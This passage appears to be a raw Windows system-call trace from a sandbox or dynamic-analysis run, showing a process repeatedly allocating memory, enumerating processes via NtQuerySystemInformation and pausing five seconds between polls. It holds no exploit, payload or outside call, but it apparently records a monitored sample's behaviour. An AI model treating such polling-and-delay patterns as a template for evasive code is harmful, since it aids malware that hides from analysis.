ResultLength=0x0) returned 0xc0000004 [0225.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.419] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.422] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.423] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.429] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.437] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.440] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.445] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.451] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.453] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.453] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.454] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.455] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.459] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.466] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.468] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.475] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.478] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.482] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.482] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.485] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.491] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.494] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.498] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.498] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.505] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.512] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.515] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.521] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.522] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.528] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.536] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.543] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.550] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.557] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.564] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.570] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.572] NtAllocateVirtualMemory (in: 